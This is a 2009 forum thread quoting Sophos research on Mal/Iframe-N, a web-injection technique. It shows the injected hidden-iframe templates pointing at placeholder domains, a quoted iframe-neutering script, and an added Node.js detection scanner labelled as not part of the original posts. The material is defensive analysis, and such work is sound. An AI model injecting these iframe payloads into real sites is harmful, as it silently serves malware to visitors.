Author Topic: Mal/Iframe-N: The next big threat?  (Read 2802 times)

October 26, 2009, 10:25:41 am

SysAdMini

http://www.sophos.com/blogs/sophoslabs/v/post/7056


Quote
What is so special about Mal/Iframe-N?

Normally, malicious Iframe's have the following form:
<iframe src=http://DOMAIN.TLD width=N height=N> where N is a small number.

Whereas, in the new attack there isn't a direct src= they use onload= like this:

<frame onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"> again N is a small number.

All the domains used so far have been based in Russia.

The tools being used to inject these Iframes are currently appending them to the end of legitimate HTML.


Example:
Code:
filmkolik.net/signaturepics/infraction.php
Code:
// 404 <script>function q84(){var a=document.getElementsByTagName('ifr'+'ame'),s='about:blank',b;for(var i=0;i<a.length;i++)if((b=a[i]).src!=s){b.src=s;b.style.display='none';b.onload=function(){this.location=s}}if(!(--JAaa))window.clearInterval(cweq)}JAaa=60000;q84();cweq=window.setInterval('q84()',1);
// iframes are EVIL! Hate Zeus!
//</script>
Ruining the bad guy's day
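
Added example, not part of the original posts or the Sophos write-up: a small Node.js heuristic scanner for the two iframe shapes quoted above, which also reports whether the tag sits after the closing </html>, as the quote describes. The function names, the SMALL_DIM threshold and the sample markup are assumptions constructed for illustration.

```javascript
// Added example: heuristic scanner for the two iframe shapes quoted above.
// SMALL_DIM, the function names and SAMPLE are assumptions of this example.
const SMALL_DIM = 10; // "N is a small number": treat width/height <= 10 as tiny

// Parse one tag's attribute text into a map keyed by lower-cased name.
function parseAttrs(tagBody) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

const isSmall = (v) => /^\d+$/.test(v || '') && Number(v) <= SMALL_DIM;

// Return one finding per suspicious <frame>/<iframe> tag in the markup.
function scanHtml(html) {
  const findings = [];
  const endOfDoc = html.toLowerCase().lastIndexOf('</html>');
  // Quoted attribute values may contain '>', so skip over them as units.
  const tagRe = /<(i?frame)\b((?:"[^"]*"|'[^']*'|[^>"'])*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const a = parseAttrs(m[2]);
    // The post notes injected tags are appended after the legitimate HTML.
    const appended = endOfDoc !== -1 && m.index > endOfDoc;
    // An assignment to this.src inside onload (not the !this.src test).
    const setSrc = /\bthis\.src\s*=(?!=)\s*['"]([^'"]+)['"]/.exec(a.onload || '');
    if (!a.src && setSrc) {
      findings.push({ rule: 'onload-src', url: setSrc[1], appended });
    } else if (a.src && isSmall(a.width) && isSmall(a.height)) {
      findings.push({ rule: 'tiny-src', url: a.src, appended });
    }
  }
  return findings;
}

// Constructed sample: a normal embed, a classic tiny iframe, an appended onload frame.
const SAMPLE = [
  '<html><body><iframe src="https://video.example/embed" width="560" height="315"></iframe>',
  '<iframe src=http://a.example/ width=1 height=1></iframe></body></html>',
  `<frame onload="if (!this.src){ this.src='http://b.example/'; this.height=1; this.width=1;}">`,
].join('\n');

console.log(scanHtml(SAMPLE));
```

A scanner that only looks for a src= attribute on tiny iframes misses the onload form entirely, which is why the handler text is inspected separately here.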

October 26, 2009, 02:32:17 pm
Reply #1

SysAdMini

http://www.sophos.com/blogs/sophoslabs/?p=7123

Quote
This morning the security researcher behind the Malware Domain List emailed me after reading Mal/Iframe-N: The next big threat? and pointed me at an interesting compromised website he had noticed.



Quote
This JavaScript is non-malicious and will neuter Iframes on a page similar to the Defensive Iframing. It appears that a malware writing team is targeting iframes and Zeus (aka ZBot). Is this the same team as those behind Bredo? Or is there a new Web-based grouping?

October 28, 2009, 08:54:48 am
Reply #2

pcaccent


October 28, 2009, 06:14:28 pm
Reply #3

SysAdMini


October 29, 2009, 05:12:16 pm
Reply #4

SysAdMini
